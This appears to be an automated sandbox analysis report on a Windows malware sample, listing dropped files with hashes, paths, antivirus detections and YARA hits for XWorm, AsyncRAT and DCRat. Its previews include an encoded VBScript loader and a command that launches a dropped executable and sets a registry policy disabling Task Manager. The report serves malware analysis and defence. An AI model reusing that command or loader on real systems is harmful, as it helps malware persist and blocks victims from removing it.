                                • Antivirus: Avira, Detection: 100%
                                • Antivirus: Joe Sandbox ML, Detection: 100%
                                • Antivirus: ReversingLabs, Detection: 88%
                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....rb..................5..6........6.. ... 6...@.. ........................6...........@...................................6.K....`6.......................6...................................................... ............... ..H............text.....5.. ....5................. ..`.sdata.../... 6..0....5.............@....rsrc........`6......$6.............@..@.reloc........6......(6.............@..B................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                Process:C:\Users\user\AppData\Roaming\Hypercontainercomponentnetcommon\ServerWeb.exe
                                File Type:ASCII text, with very long lines (448), with no line terminators
                                Category:dropped
                                Size (bytes):448
                                Entropy (8bit):5.832145273021852
                                Encrypted:false
                                SSDEEP:12:DLuHHtp65cBqEBwqOusV6lblNouJHfjRXn1X5CNps2nKDay:DyntwiBqXqOus6piGfjRlXMNps2Py
                                MD5:D7AF488048FDEBBAAB7AA310C73ADB5B
                                SHA1:56663EF8ABE1E14B5508E12911BBA42603C48AF4
                                SHA-256:4BD5355AD4DD1BC4C925513B43D9E90FBF6A627BD5AE5248F7F20297DAEBC38D
                                SHA-512:E7AB132853375C8AC93A9EE4F93EA41B88E9D05CB92C285222911B5B7DC685DFAE34606A4FD5E6FE7CF3BA0CF71BD5D77062DB40096B5E705B53B681C07F06DF
                                Malicious:false
                                Preview:w48bbYuuiDGln75THdiTU5iCPsjQridGWigpICXHCjrx2CRBCBLGorG1W5LtzdCAj9PEbQLFFbQvOuKNahNqXWboboTM1oRjgqN2xMkwzFBNaVnlu8TRPWmNhkmw78OaKrPhhSaN7b0RVOOGBrc2U9TJDAVMkxz01kDsFGDciFUygV2SWguPgVGKYFdh6NnJl9auLfA5n9UPpfnsHC0EDkTfe3UAmgfUcKMg5HH0fzlhA0e2buZ4XjGBq4PSLASHdAxeTHxA49iO8wenYci1Gl62EKzA1zpegdEAD9jU7Z9YA2C4Zm3sbbA1D4aIRwIEUErerekY2N4rmi1LH5kP66CEdM6IjbCLR5D6KiM5Bf0NhSPfCOAVL2IXBmBfibzbLtaqe5BjtpOaGyhK6aFUaq9Ywq5hgqXjqYCx2iAHNbmfosRMF1iHWeBetB4yAeCC
                                Process:C:\Users\user\AppData\Roaming\Hypercontainercomponentnetcommon\ServerWeb.exe
                                File Type:ASCII text, with very long lines (662), with no line terminators
                                Category:dropped
                                Size (bytes):662
                                Entropy (8bit):5.899444164976039
                                Encrypted:false
                                SSDEEP:12:iR9TsBxWwNIOI4M5fq06yGEWPguDA13zOH8otxyddofeu:4kxWCI9jOyGT4uDA1DOH9xUdofeu
                                MD5:D6458947138A5918158670EC1B8EB45F
                                SHA1:A51043A82FB1F0625CA64903102F14BFDEB00CD8
                                SHA-256:4876F58C65C70C9597DB875D0A161BD5D47E24EA84FEE6F621F126FB112581C9
                                SHA-512:47B73D80CE0782AD1C38FFF7034517F6A21CACFF80C466496C06D7B8F42C1488E3165D5B84F8217E6E3428B18565B696136E417B603D0F217934F2529B247BE2
                                Malicious:false
                                Preview:sobJTIs2nONxKDrZ2zezB5f9U2jBizCCtwkTv5KTygMwu9ihRsXqFknxIczbiqTyLLEYcYn7oLBfssOVUCtzcW7JJwKTGtuHMYlj5KE3FZC4jHFaNeHg7dVzN5OqNU14a3TUHoaJ80uCUDjCruFlmOKtCvW96YquiHdpyuSjE7iHsSfKVM8dPPSMtjRVSaNjJAeMk4N6bfhoqDAuQMotZMfTyR6Od6Rou87sySkb8CBtrofqjhFGvdK7fKYS79dfO34sGR58mNvWLvlKvPo61K2QxANo4Rd8jgeytxkSmGeisxvtiNhrUgnEAo4GEREUtwxpRxa8pWUuqUhAOdFquvoC2axF2eNUCJy69GcvxjC8M3XqG41kMYk8Ivx0AVFLI9shflAIBT3Ltpz9CG98mnIoi0xOTlvbd00NK0Le4tj2eZOc6xy3VGjf0D8pyvyaibr3zlyM5eD2DQJJlVSfx1FWQUXG1gqI4JTDsVnU9l81Cqbj4yDcdTmrVUmeNrUZy5847GbQs7fL3OUk3xMDcNolgmrXsIGSQiCHsgmyXwugybyGABlZeR6lQXYVYDhk0N4UMM2WLYpqcIwFxlXrgrx9mb0UIRaTOKqkgd4xJPOGlPIIkShwq0DJZ5ruVhN47WbRbMjTqjhQcrXWTsu0tn
                                Process:C:\Users\user\AppData\Roaming\Hypercontainercomponentnetcommon\ServerWeb.exe
                                File Type:ASCII text, with CRLF line terminators
                                Category:dropped
                                Size (bytes):1915
                                Entropy (8bit):5.363869398054153
                                Encrypted:false
                                SSDEEP:48:MxHKQ71qHGIs0HKCYHKGSI6oPtHTHhAHKKkhHNpvJHVHmHKlT4x:iq+wmj0qCYqGSI6oPtzHeqKkhtpB1Gq2
                                MD5:5D3E8414C47C0F4A064FA0043789EC3E
                                SHA1:CF7FC44D13EA93E644AC81C5FE61D6C8EDFA41B0
                                SHA-256:4FDFF52E159C9D420E13E429CCD2B40025A0110AD84DC357BE17E21654BEEBC7
                                SHA-512:74D567BBBA09EDF55D2422653F6647DCFBA8EF6CA0D4DBEBD91E3CA9B3A278C99FA52832EDF823F293C416053727D0CF15F878EC1278E62524DA1513DA4AC6AF
                                Malicious:false
                                Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System\b187b7f31cee3e87b56c8edca55324e0\System.ni.dll",0..3,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Drawing\567ff6b0de7f9dcd8111001e94ab7cf6\System.Drawing.ni.dll",0..3,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Windows.Forms\2a7fffeef3976b2a6f273db66b1f0107\System.Windows.Forms.ni.dll",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Core\31326613607f69254f3284ec964796c8\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_64\S
                                Process:C:\Program Files (x86)\jDownloader\config\conhost.exe
                                File Type:CSV text
                                Category:dropped
                                Size (bytes):1281
                                Entropy (8bit):5.370111951859942
                                Encrypted:false
                                SSDEEP:24:ML9E4KQ71qE4GIs0E4KCKDE4KGKZI6KhPKIE4TKBGKoZAE4KKUNb:MxHKQ71qHGIs0HKCYHKGSI6oPtHTHhA2
                                MD5:12C61586CD59AA6F2A21DF30501F71BD
                                SHA1:E6B279DC134544867C868E3FF3C267A06CE340C7
                                SHA-256:EC20A856DBBCF320F7F24C823D6E9D2FD10E9335F5DE2F56AB9A7DF1ED358543
                                SHA-512:B0731F59C74C9D25A4C82E166B3DC300BBCF89F6969918EC748B867C641ED0D8E0DE81AAC68209EF140219861B4939F1B07D0885ACA112D494D23AAF9A9C03FE
                                Malicious:false
                                Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System\b187b7f31cee3e87b56c8edca55324e0\System.ni.dll",0..3,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Drawing\567ff6b0de7f9dcd8111001e94ab7cf6\System.Drawing.ni.dll",0..3,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Windows.Forms\2a7fffeef3976b2a6f273db66b1f0107\System.Windows.Forms.ni.dll",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Core\31326613607f69254f3284ec964796c8\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_64\S
                                Process:C:\Users\user\AppData\Local\Temp\RarSFX0\Result.exe
                                File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                Category:dropped
                                Size (bytes):3880844
                                Entropy (8bit):7.7455500264939205
                                Encrypted:false
                                SSDEEP:49152:tbA3wvcdwQZHEwTDiztbzw4zcvOCpkA4CKDOh2ukUZLMAD22T7Xp/whX7ZUWR9iD:tbOXZHEwTUzcvtpzh2xKbepZrs
                                MD5:95D7FC6FAA389C5751DE5C2F88D9580B
                                SHA1:E6E7D542E3EC916464B77103B04E7F1722FE9A84
                                SHA-256:A388D9B021EC9BE1B20504D4673AC3388B64255B6B073BD4D3F348524B3E888B
                                SHA-512:C1B5D1EA1513225D1898EEDB0344E08818703CCBD07F366970338CF83998DC32CF372D0367E6C128B356045A2C79164B8C17031BE21553FEBF4DA79EF7766FA2
                                Malicious:true
                                Antivirus:
                                • Antivirus: Avira, Detection: 100%
                                • Antivirus: Joe Sandbox ML, Detection: 100%
                                • Antivirus: ReversingLabs, Detection: 73%
                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......b`..&...&...&.....h.+.....j.......k.>.....^.$...._..0...._..5...._....../y..,.../y..#...&...*...._......._..'...._f.'...._..'...Rich&...................PE..L....._............................@........0....@.......................................@......................... ...4...T...<....0.......................P..h"......T............................U..@............0..`...... ....................text............................... ..`.rdata.......0......................@..@.data...(7..........................@....didat....... ......................@....rsrc........0......................@..@.reloc..h"...P...$..................@..B........................................................................................................................................................................................................................................
                                Process:C:\Users\user\Desktop\ywXeiXEvP2.exe
                                File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                Category:dropped
                                Size (bytes):4012544
                                Entropy (8bit):7.727131196942866
                                Encrypted:false
                                SSDEEP:49152:bSbA3wvcdwQZHEwTDiztbzw4zcvOCpkA4CKDOh2ukUZLMAD22T7Xp/whX7ZUWR9Q:+bOXZHEwTUzcvtpzh2xKbepZro
                                MD5:57D593692C8428B66ED146E1FAC689B7
                                SHA1:E9318D78EFD4639D510ED9F39C8C3FCA74BA9E14
                                SHA-256:9A75E3D28B75744CE468224B00CA5CAEDD73DF7F71C797DF2CBEE2E9AC2D9A81
                                SHA-512:49293771DC734CA8802B0B9B8F61E77294819AB00983F5BB4F12205965E44ABE2B5E5EAD3DDF24FC8B5AB5392884B1422995C8B1E54B64FB693FCF3A50518F32
                                Malicious:true
                                Yara Hits:
                                • Rule: JoeSecurity_XWorm, Description: Yara detected XWorm, Source: C:\Users\user\AppData\Local\Temp\RarSFX0\Result.exe, Author: Joe Security
                                • Rule: MALWARE_Win_AsyncRAT, Description: Detects AsyncRAT, Source: C:\Users\user\AppData\Local\Temp\RarSFX0\Result.exe, Author: ditekSHen
                                Antivirus:
                                • Antivirus: Avira, Detection: 100%
                                • Antivirus: Avira, Detection: 100%
                                • Antivirus: Avira, Detection: 100%
                                • Antivirus: Joe Sandbox ML, Detection: 100%
                                • Antivirus: ReversingLabs, Detection: 95%
                                Preview:MZP.....................@...............................................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L....^B*....................."=...... .......0....@...........................=..................@...........................P............=..................................................p......................................................CODE................................ ..`DATA....|....0......................@...BSS..........@...........................idata.......P......................@....tls.........`...........................rdata.......p......................@..P.reloc............... ..............@..P.rsrc.....=.......=.."..............@..P.....................$..............@..P........................................................................................................................................
                                Process:C:\Users\user\AppData\Local\Temp\RarSFX0\Result.exe
                                File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                Category:dropped
                                Size (bytes):34816
                                Entropy (8bit):5.5792271146909735
                                Encrypted:false
                                SSDEEP:384:OLxpXSqGWjxaAiQcamYpnnGnRLGVYCwvHixdTD2VR8pkFTBLTIZwYGDcvw9Ikuia:6XNcaZodYYC4CaV9FZ9jcOjhB/45
                                MD5:1BE2B217087429A8397F448C9C7B8F8D
                                SHA1:4507E83E00CC18D738452D9217F4DFA19CA9D2DE
                                SHA-256:D4482CA83D2A2DBD011C63739477E90893728AF1A0B4E5FBC6413009573F7702
                                SHA-512:8588A0EFAF8D857D773E5947D2EE7599559C1BDB139B5E28030E02ACA6B93C0291BA80616BA06B3A96E50059D829B233CBF854EF807AA313CF8E7890613B8922
                                Malicious:true
                                Yara Hits:
                                • Rule: JoeSecurity_XWorm, Description: Yara detected XWorm, Source: C:\Users\user\AppData\Local\Temp\XClient.exe, Author: Joe Security
                                • Rule: MALWARE_Win_AsyncRAT, Description: Detects AsyncRAT, Source: C:\Users\user\AppData\Local\Temp\XClient.exe, Author: ditekSHen
                                Antivirus:
                                • Antivirus: Avira, Detection: 100%
                                • Antivirus: Joe Sandbox ML, Detection: 100%
                                • Antivirus: ReversingLabs, Detection: 96%
                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....[af.................~............... ........@.. ....................................@.....................................K.................................................................................... ............... ..H............text....}... ...~.................. ..`.rsrc...............................@..@.reloc..............................@..B.......................H........Q...J............................................................(....*..(....*.s.........s.........s.........s.........*...0..........~....o.....+..*..0..........~....o.....+..*..0..........~....o.....+..*..0..........~....o.....+..*..0............(....(.....+..*....0...........(.....+..*..0...............(.....+..*..0...........(.....+..*..0................-.(...+.+.+...+..*.0.........................*..(....*.0.. .......~.........-.(...+.....~.....+..*..(....*.0..
                                Process:C:\Users\user\AppData\Local\Temp\DCRatBuild.exe
                                File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                Category:dropped
                                Size (bytes):3549696
                                Entropy (8bit):7.781810498852624
                                Encrypted:false
                                SSDEEP:49152:adwQZHEwTDiztbzw4zcvOCpkA4CKDOh2ukUZLMAD22T7Xp/whX7ZUWR9i:2XZHEwTUzcvtpzh2xKbepZr
                                MD5:7EC6BC11E4B2E409845E3160EC47F5D7
                                SHA1:C1A1A62F844556FD150C7515E124E98BF6D79A02
                                SHA-256:B59342163EA5752E627B1EB236F42A9882F15FDFF96CA77EBA7B20E416F4A4F3
                                SHA-512:6E6D00144C0F73CA595008074B716631D79A73A4770B75ACDC5CCC743C81B1B36B92BCBAA24C5B6EEC5F4D8D01026E33A70D9FFF4A133AF075FE493FEACFDBD3
                                Malicious:true
                                Antivirus:
                                • Antivirus: Avira, Detection: 100%
                                • Antivirus: Joe Sandbox ML, Detection: 100%
                                • Antivirus: ReversingLabs, Detection: 88%
                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....rb..................5..6........6.. ... 6...@.. ........................6...........@...................................6.K....`6.......................6...................................................... ............... ..H............text.....5.. ....5................. ..`.sdata.../... 6..0....5.............@....rsrc........`6......$6.............@..@.reloc........6......(6.............@..B................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                Process:C:\Users\user\AppData\Local\Temp\DCRatBuild.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):239
                                Entropy (8bit):5.874652570260906
                                Encrypted:false
                                SSDEEP:6:Gbt2wqK+NkLzWbHo18nZNDd3RL1wQJRZ7CvdhtMGoIRP:GxMCzWLo14d3XBJr7weG5
                                MD5:CD2394B62B0E45E8F0FE6574406B69E4
                                SHA1:F85F70C37BB54FF9274F83B899F3127774687DDF
                                SHA-256:EC38AAA0DE9073F8FAA3FEEAA3184C86162623F207331CD59E4CAD94A68F4048
                                SHA-512:D4CA9529DBA04F0C19FD3AE2E3DD5B6E8292B87634168F26AD8D3CDDFD63973DDAB38E6F7AA393B6CAB3C52B3E6D5360D07DE8E5262BF064E09A64A608CF9058
                                Malicious:true
                                Antivirus:
                                • Antivirus: Avira, Detection: 100%
                                Preview:#@~^1gAAAA==j.Y~q/4?t.V^~',Z.+mYn6(L+1O`r.?1.rwDRUtnVsE*@#@&.U^DbwO UV+n2vGT!Zb@#@&j.Y,./4?4nV^PxP;DnCD+r(%+1Y`r.jmMkaY ?4n^VE#@#@&.ktj4.VV ]!x~Ju)aw9mYm]z_XanD1WUYmkUnMmWs2W.+xDUnY1Ws:Gx&4`;H3T(H7GUeycjen.|T+Dsc4CDJBP!BP6CVk+f0YAAA==^#~@.
                                Process:C:\Users\user\AppData\Local\Temp\DCRatBuild.exe
                                File Type:ASCII text, with no line terminators
                                Category:dropped
                                Size (bytes):34
                                Entropy (8bit):4.124083797069061
                                Encrypted:false
                                SSDEEP:3:LlzRWDNMSdn:PWbn
                                MD5:677CC4360477C72CB0CE00406A949C61
                                SHA1:B679E8C3427F6C5FC47C8AC46CD0E56C9424DE05
                                SHA-256:F1CCCB5AE4AA51D293BD3C7D2A1A04CB7847D22C5DB8E05AC64E9A6D7455AA0B
                                SHA-512:7CFE2CC92F9E659F0A15A295624D611B3363BD01EB5BCF9BC7681EA9B70B0564D192D570D294657C8DC2C93497FA3B4526C975A9BF35D69617C31D9936573C6A
                                Malicious:false
                                Preview:MsgBox "TestDefault, Message!", 64
                                Process:C:\Users\user\AppData\Local\Temp\DCRatBuild.exe
                                File Type:ASCII text, with no line terminators
                                Category:dropped
                                Size (bytes):170
                                Entropy (8bit):5.009104760931058
                                Encrypted:false
                                SSDEEP:3:BtV+EM0XRAGKkljrAEFDFQNBZwXD9so3KRfyM1K7eB/k+7W34hebJNAKyMhF7FKD:BIMekFiTStuH1jhRiI36BY
                                MD5:2D7EF4649D4D1191B1201674616CC588
                                SHA1:88FB16975F9D9EF0512BC35F82B674215D856C24
                                SHA-256:EA01569970E47289F27369C7019C9CD988D471BCC8B65337EC295806C419302D
                                SHA-512:B8CB8B6860A9FC892BC8398612C48B2C8C8E63EE10928A31E466A94255D7BBD0F22F2750621CD13364517C0A78FD887A09F005CAFC7CFAC5D72FB7D4A51B5489
                                Malicious:false
                                Preview:"%AppData%\Hypercontainercomponentnetcommon\ServerWeb.exe" & reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableTaskMgr /t REG_DWORD /d 1 /f
                                Process:C:\Users\user\AppData\Roaming\Hypercontainercomponentnetcommon\ServerWeb.exe
                                File Type:ASCII text, with very long lines (427), with no line terminators
                                Category:dropped
                                Size (bytes):427
                                Entropy (8bit):5.832519112443163
                                Encrypted:false
                                SSDEEP:12:nOEQDiVsjsLkL84gqyqjIm9KUL1AgR8WEfGLa33Lc8WK:nOrDiVAs+84dIK7APWEl7NR
                                MD5:CA3CC9DC4EC03B2390871DC7231B8C2D
                                SHA1:6431C5866B9C057C846F1800540167FAC57D33A5
                                SHA-256:FE3EDD9041C909B73145E2E525025A467C0D449F27F39E4F006020767953DA2D
                                SHA-512:04892CD7A9FD80F47FFDED89351D8C034724A408252D7A8C25910B4A5D725E6D832394F03C555D72D5479F3C278483CD3D232AA4A9BCAB5D788B81DA9021AFB8
                                Malicious:false
                                Preview:GoDRzXrpSSG0sqpy1DAZtkLhJw9dTkPLXTIC1cHthAh71xSdZ7CrztqfdfHCYNWsC4cZhn7Y6Q1tCNqVdgEVhiVonniVVEVUoz57V36wAovj27dQyvj2JAKdiyv4ElC15hEMRsAjkSU3xwvpJShkfdKnpbZgICrZl4nV2Q8Fu9S1pRqvDGuvEcVcWbhzTebik5R2IZx3UbzgKT7XvndCR6VIiL9bsIwQhuRu9xmnT0bnmyRDdJEqAZQnkIU7aVLLoj9aBNY7Bzsbfsgu458iDGPHdnK0dpM7pP8Cz0BQuHoLqyI2mjDeXmIiU16YCidWmvwPtd4D4sx6bEapeSN3lskCGZs73mNMnSi5C2IJp9kpyLHPaR3uUju4LtITu7JRelSIgfmlJEOmI5O5Sdgmtc1DinuStyYszSKN39t5oRk
                                Process:C:\Users\user\AppData\Roaming\Hypercontainercomponentnetcommon\ServerWeb.exe
                                File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                Category:dropped
                                Size (bytes):3549696
                                Entropy (8bit):7.781810498852624
                                Encrypted:false
                                SSDEEP:49152:adwQZHEwTDiztbzw4zcvOCpkA4CKDOh2ukUZLMAD22T7Xp/whX7ZUWR9i:2XZHEwTUzcvtpzh2xKbepZr
                                MD5:7EC6BC11E4B2E409845E3160EC47F5D7
                                SHA1:C1A1A62F844556FD150C7515E124E98BF6D79A02
                                SHA-256:B59342163EA5752E627B1EB236F42A9882F15FDFF96CA77EBA7B20E416F4A4F3
                                SHA-512:6E6D00144C0F73CA595008074B716631D79A73A4770B75ACDC5CCC743C81B1B36B92BCBAA24C5B6EEC5F4D8D01026E33A70D9FFF4A133AF075FE493FEACFDBD3
                                Malicious:true
                                Antivirus:
                                • Antivirus: Avira, Detection: 100%
                                • Antivirus: Joe Sandbox ML, Detection: 100%
                                • Antivirus: ReversingLabs, Detection: 88%
                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....rb..................5..6........6.. ... 6...@.. ........................6...........@...................................6.K....`6.......................6...................................................... ............... ..H............text.....5.. ....5................. ..`.sdata.../... 6..0....5.............@....rsrc........`6......$6.............@..@.reloc........6......(6.............@..B................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                Process:C:\Users\user\AppData\Local\Temp\XClient.exe
                                File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Archive, ctime=Tue Jun 11 17:07:08 2024, mtime=Tue Jun 11 17:07:08 2024, atime=Tue Jun 11 17:07:08 2024, length=34816, window=hide
                                Category:dropped
                                Size (bytes):764
                                Entropy (8bit):5.074344665573905
                                Encrypted:false
                                SSDEEP:12:8e124dO0WCiTu8dY//YFLbHK9jAsVDrHkJ/BmV:8eps/JTd+whbHK5AsVDYJ/Bm
                                MD5:D847E720A8D91E58A3FC05B3895FD26E
                                SHA1:79C7EA507EF330B14CE06EDFCEED4F089FCAD4C4
                                SHA-256:403728DE6CF119200CEE71915516309CD0E6F0B34F65DF70CF01CAF4CAE45AF8
                                SHA-512:B518C65F3018271BEACE1F81E4D74A88202BB5176CFC3DD6186B5C7278114BB63F0A41E52ECDB352A93C31494191BEF59BDA26AF475FAE8FC9E56014AD39A52D
                                Malicious:false
                                Preview:L..................F.... ......,*......,*......,*...........................v.:..DG..Yr?.D..U..k0.&...&......vk.v......#*......,*.......t...CFSF..1.....CW.^..AppData...t.Y^...H.g.3..(.....gVA.G..k...@......CW.^.X.............................%..A.p.p.D.a.t.a...B.V.1......X...Roaming.@......CW.^.X............................0.R.o.a.m.i.n.g.....b.2......X. .XClient.exe.H.......X..X.....a.....................W...X.C.l.i.e.n.t...e.x.e.......Y...............-.......X.............".....C:\Users\user\AppData\Roaming\XClient.exe........\.....\.....\.....\.....\.X.C.l.i.e.n.t...e.x.e.`.......X.......910646...........hT..CrF.f4... ..T..b...,.......hT..CrF.f4... ..T..b...,......E.......9...1SPS..mD..pH.H@..=x.....h....H.....K...YM...?................
                                Process:C:\Users\user\AppData\Local\Temp\XClient.exe
                                File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                Category:dropped
                                Size (bytes):34816
                                Entropy (8bit):5.5792271146909735
                                Encrypted:false
                                SSDEEP:384:OLxpXSqGWjxaAiQcamYpnnGnRLGVYCwvHixdTD2VR8pkFTBLTIZwYGDcvw9Ikuia:6XNcaZodYYC4CaV9FZ9jcOjhB/45
                                MD5:1BE2B217087429A8397F448C9C7B8F8D
                                SHA1:4507E83E00CC18D738452D9217F4DFA19CA9D2DE
                                SHA-256:D4482CA83D2A2DBD011C63739477E90893728AF1A0B4E5FBC6413009573F7702
                                SHA-512:8588A0EFAF8D857D773E5947D2EE7599559C1BDB139B5E28030E02ACA6B93C0291BA80616BA06B3A96E50059D829B233CBF854EF807AA313CF8E7890613B8922
                                Malicious:true
                                Yara Hits:
                                • Rule: JoeSecurity_XWorm, Description: Yara detected XWorm, Source: C:\Users\user\AppData\Roaming\XClient.exe, Author: Joe Security
                                • Rule: MALWARE_Win_AsyncRAT, Description: Detects AsyncRAT, Source: C:\Users\user\AppData\Roaming\XClient.exe, Author: ditekSHen
                                Antivirus:
                                • Antivirus: Avira, Detection: 100%
                                • Antivirus: Joe Sandbox ML, Detection: 100%
                                • Antivirus: ReversingLabs, Detection: 96%
                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....[af.................~............... ........@.. ....................................@.....................................K.................................................................................... ............... ..H............text....}... ...~.................. ..`.rsrc...............................@..@.reloc..............................@..B.......................H........Q...J............................................................(....*..(....*.s.........s.........s.........s.........*...0..........~....o.....+..*..0..........~....o.....+..*..0..........~....o.....+..*..0..........~....o.....+..*..0............(....(.....+..*....0...........(.....+..*..0...............(.....+..*..0...........(.....+..*..0................-.(...+.+.+...+..*.0.........................*..(....*.0.. .......~.........-.(...+.....~.....+..*..(....*.0..
                                Process:C:\Users\user\AppData\Roaming\Hypercontainercomponentnetcommon\ServerWeb.exe
                                File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                Category:dropped
                                Size (bytes):3549696
                                Entropy (8bit):7.781810498852624
                                Encrypted:false
                                SSDEEP:49152:adwQZHEwTDiztbzw4zcvOCpkA4CKDOh2ukUZLMAD22T7Xp/whX7ZUWR9i:2XZHEwTUzcvtpzh2xKbepZr
                                MD5:7EC6BC11E4B2E409845E3160EC47F5D7
                                SHA1:C1A1A62F844556FD150C7515E124E98BF6D79A02
                                SHA-256:B59342163EA5752E627B1EB236F42A9882F15FDFF96CA77EBA7B20E416F4A4F3
                                SHA-512:6E6D00144C0F73CA595008074B716631D79A73A4770B75ACDC5CCC743C81B1B36B92BCBAA24C5B6EEC5F4D8D01026E33A70D9FFF4A133AF075FE493FEACFDBD3
                                Malicious:true
                                Antivirus:
                                • Antivirus: ReversingLabs, Detection: 88%
                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....rb..................5..6........6.. ... 6...@.. ........................6...........@...................................6.K....`6.......................6...................................................... ............... ..H............text.....5.. ....5................. ..`.sdata.../... 6..0....5.............@....rsrc........`6......$6.............@..@.reloc........6......(6.............@..B................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                Process:C:\Users\user\AppData\Roaming\Hypercontainercomponentnetcommon\ServerWeb.exe
                                File Type:ASCII text, with very long lines (563), with no line terminators
                                Category:dropped
                                Size (bytes):563
                                Entropy (8bit):5.879761936610048
                                Encrypted:false
                                SSDEEP:12:X4fkF8Tl/SXjOHm9knJSOk8vWGefvpTBHAl7iyNVUcBu10U:XpzTlIJSL+Wttg990kS
                                MD5:1DFF6D48FC17B3FEBFE7DA7C08751F3C
                                SHA1:7E60CAE161972837284D562A79CAF0D88FDF8A94
                                SHA-256:063943635866CD94DE6B52EF3A53758AC7F2EDDCF9BF0237E98D517EFDC7412D
                                SHA-512:B2778079E84F7205EC457A23D2AB852903AA2799E289955525C9ED26171FC97FBC5FB816C2D6C5A9B20FC15B711BACAAFDF3C4693406CB7931A479431C728BE0
                                Malicious:false
                                Preview:gffLo1bYZtuMOku1ahMNL3cNb0MyDST3M8tVRVKIMSHIoWrT4URQDBWmCSuxpnVHZ19Q1YjEXDA3vUiFI24tACzLlGS9lWdj7AtxWbbfuN39Ad1stoowslGWBypuGkcAjb6ukvtraY8xJzLIPjP6sr0V4WviwrZJu2ajhGI856WTmSMLngfgVfS2kk0N9K5t9zCRZllJbRBvVgsmKj5PL3yPki96P48uBmUxP5wB5VEEeghD1ODaPphFBxr1mo3hSQusL5WPx3TzytvEA5EB1ifVEPwcO4ZRbhvNvy162ymVVrQRBn0qk2quvYn6J3A2eCYR8hSMDHJC5J9W8ealEsri1AcXK5x8xu1TT9SeUomctnzlYR8odZywVzZ8E4BIUKPLRqC8L6QaFOzOL0936JfX5E8ejUZaneIjXnTrO9cgJYrG9LxO5HMLp2PMsiY1hzxlGQ1hhRp7q8OhX1eYhLffS73fXG9pkl8TkGAtUPqobPeqnrz1DATWURSIWVJaR9WE946R0uDRe0DDcN1qRImkSm8Tx1X8FQWc2aqtuhAS6B2dOPq
                                Process:C:\Users\user\AppData\Roaming\Hypercontainercomponentnetcommon\ServerWeb.exe
                                File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                Category:dropped
                                Size (bytes):3549696
                                Entropy (8bit):7.781810498852624
                                Encrypted:false
                                SSDEEP:49152:adwQZHEwTDiztbzw4zcvOCpkA4CKDOh2ukUZLMAD22T7Xp/whX7ZUWR9i:2XZHEwTUzcvtpzh2xKbepZr
                                MD5:7EC6BC11E4B2E409845E3160EC47F5D7
                                SHA1:C1A1A62F844556FD150C7515E124E98BF6D79A02
                                SHA-256:B59342163EA5752E627B1EB236F42A9882F15FDFF96CA77EBA7B20E416F4A4F3
                                SHA-512:6E6D00144C0F73CA595008074B716631D79A73A4770B75ACDC5CCC743C81B1B36B92BCBAA24C5B6EEC5F4D8D01026E33A70D9FFF4A133AF075FE493FEACFDBD3
                                Malicious:true
                                Antivirus:
                                • Antivirus: ReversingLabs, Detection: 88%
                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....rb..................5..6........6.. ... 6...@.. ........................6...........@...................................6.K....`6.......................6...................................................... ............... ..H............text.....5.. ....5................. ..`.sdata.../... 6..0....5.............@....rsrc........`6......$6.............@..@.reloc........6......(6.............@..B................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                Process:C:\Users\user\AppData\Roaming\Hypercontainercomponentnetcommon\ServerWeb.exe
                                File Type:ASCII text, with no line terminators
                                Category:dropped
                                Size (bytes):16
                                Entropy (8bit):3.625
                                Encrypted:false
                                SSDEEP:3:cuW5ccK:zW5ccK
